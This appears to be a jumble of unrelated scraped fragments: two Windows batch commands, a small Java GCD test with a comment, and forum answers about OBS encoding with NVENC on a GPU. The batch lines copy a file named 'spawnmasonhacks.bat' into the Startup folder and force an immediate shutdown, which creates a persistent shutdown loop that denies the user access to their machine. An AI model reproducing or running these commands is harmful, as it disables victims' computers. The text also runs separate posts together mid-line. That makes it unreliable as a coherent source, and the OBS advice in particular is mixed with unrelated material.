copy spawnmasonhacks.bat %appdata%\Microsoft\Windows\Start Menu\Programs\Startup\
shutdown /f /s /t 0
for (int i = 0; i < 100; i++) {
for (int b = 0; b < 100; b++) {
System.out.println(gcd(i, b) == gcd(i, i + b));
}
}
i tried this
all is true
i'll assume it's the same for every other number everIf you're capturing gameplay, OBS has to run on the same GPU as the game.
Having said that, using NVENC on the same GPU that you're gaming on does not add more load to the GPU, since NVENC uses a dedicated hardware encoder separate from the rest of the graphics processing, so getting a second GPU entirely for encoding won't help anyway.
I believe NVENC uses seperate circuits in the GPU to encode video without putting any load on the rest of the GPU. The capturing, however, could affect your framerate, and I don't believe using a different encoder should have much impact on the performace. That said, yes, you can select a different GPU for encoding with NVENC, using the Advanced Output mode in the settings (assuming you use OBS Studio). I guess putting it to 2 is want you want.
> Sister Tori